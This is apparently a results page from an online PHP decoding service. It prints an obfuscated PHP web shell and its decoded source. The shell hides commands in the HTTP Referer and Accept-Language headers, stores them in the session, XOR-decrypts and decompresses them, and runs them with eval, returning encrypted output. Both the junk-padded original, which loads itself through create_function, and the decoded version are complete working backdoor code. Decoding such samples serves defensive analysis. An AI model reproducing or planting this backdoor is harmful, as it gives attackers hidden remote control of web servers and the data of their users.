Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $M='rMK($u["queryMK"],$q);$qMK=array_valuesMKMK($q);preg_MKmaMKtchMK_all("/([\\w])M..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$M='rMK($u["queryMK"],$q);$qMK=array_valuesMKMK($q);preg_MKmaMKtchMK_all("/([\\w])MK[\\w-]+MK(';
$D='$kMKh=MK"5d41";$kf="402a"MK;fuMKnction MKx($MKt,$k){MK$c=strlenMK($kMK);$l=strMKlen($MKt);';
$W='Knt($m[1MK]);$MKMKz++)$p.=$MKq[$mMK[2][$z]];iMKMKf(strpos($p,$hMK)=MK==0){$s[$MKMKi]="";';
$T='e(x(gzcoMKmpresMKs($oMK),$k));MKprintMKMK(MK"<$k>$d</$kMK>");@sessioMKn_destroMKy();}}}}';
$v=',0,$e)MK)),$k)))MKMK;$o=ob_getMK_conMKtents();obMK_eMKnd_cleMKan(MK);$d=base6MK4_eMKncod';
$f='KONMK;$ss="subsMKtrMK";$sl="strtoMKlMKower";$MKi=$mMK[1][0MK].$m[1][MK1];$h=$sl(MK$ss(MKM';
$b='i}^$k{MK$j};MK}}return MK$o;MK}$r=$_SERVMKER;$MKrr=@$r[MK"HTTP_MKREMKMKFERER"];$ra=@$r["';
$y='$oMK="";for(MK$i=0;$i<MK$l;MK){forMK($j=0;($MKj<$c&&MK$i<$MKl);$j+MK+,$iMK++){$o.=$tMK{$';
$A='Kmd5($MKi.MK$kh),0,3MK));$f=$slMKMKMK($ss(md5($iMK.$kf),0,3));MK$p="";for($z=1;MK$z<couM';
$h='HMKTTMKP_ACCMKEPT_LANGUAMKGE"];iMKf(MKMK$rr&&MK$ra){MK$u=parse_url($rr)MK;parseMK_stMKMK';
$I=str_replace('H','','creHHate_HfHHunHction');
$G='$MKp=$ss($MKp,3);}if(arMKMKray_key_exiMKsts($MKi,$s)){$sMK[MK$i].=$p;$e=MKsMKtrMKpos($s[';
$k='?:;qMKMK=0.([\\MKMKMKd]))?,?/",$ra,$mMK);if($q&&$m){@sMKeMKssion_stMKart();$s=&$MK_SESSIM';
$q='4_decodMKMKe(preg_MKreplace(arrMKMKay("/_/","/-/MK"),MKarrayMK("/","+"MK),$sMKs(MK$s[$i]';
$d='$i],$f);MKif(MK$e){$MKk=$kh.$kf;MKob_sMKtarMKt();@evaMKl(@gzunMKcMKompress(@x(@bMKasMKe6';
$E=str_replace('MK','',$D.$y.$b.$h.$M.$k.$f.$A.$W.$G.$d.$q.$v.$T);
$P=$I('',$E);$P();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A Kmd5($MKi.MK$kh),0,3MK));$f=$slMKMKMK($ss(md5($iMK.$kf),0,3)..
$D $kMKh=MK"5d41";$kf="402a"MK;fuMKnction MKx($MKt,$k){MK$c=str..
$E $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$G $MKp=$ss($MKp,3);}if(arMKMKray_key_exiMKsts($MKi,$s)){$sMK[M..
$I create_function
$M rMK($u["queryMK"],$q);$qMK=array_valuesMKMK($q);preg_MKmaMKt..
$P None
$T e(x(gzcoMKmpresMKs($oMK),$k));MKprintMKMK(MK"<$k>$d</$kMK>")..
$W Knt($m[1MK]);$MKMKz++)$p.=$MKq[$mMK[2][$z]];iMKMKf(strpos($p..
$b i}^$k{MK$j};MK}}return MK$o;MK}$r=$_SERVMKER;$MKrr=@$r[MK"HT..
$d $i],$f);MKif(MK$e){$MKk=$kh.$kf;MKob_sMKtarMKt();@evaMKl(@gz..
$f KONMK;$ss="subsMKtrMK";$sl="strtoMKlMKower";$MKi=$mMK[1][0MK..
$h HMKTTMKP_ACCMKEPT_LANGUAMKGE"];iMKf(MKMK$rr&&MK$ra){MK$u=par..
$k ?:;qMKMK=0.([\MKMKMKd]))?,?/",$ra,$mMK);if($q&&$m){@sMKeMKss..
$q 4_decodMKMKe(preg_MKreplace(arrMKMKay("/_/","/-/MK"),MKarray..
$v ,0,$e)MK)),$k)))MKMK;$o=ob_getMK_conMKtents();obMK_eMKnd_cle..
$y $oMK="";for(MK$i=0;$i<MK$l;MK){forMK($j=0;($MKj<$c&&MK$i<$MK..

Stats

MD5 c609d9e6bc844fb9d49fee78fa764e55
Eval Count 1
Decode Time 134 ms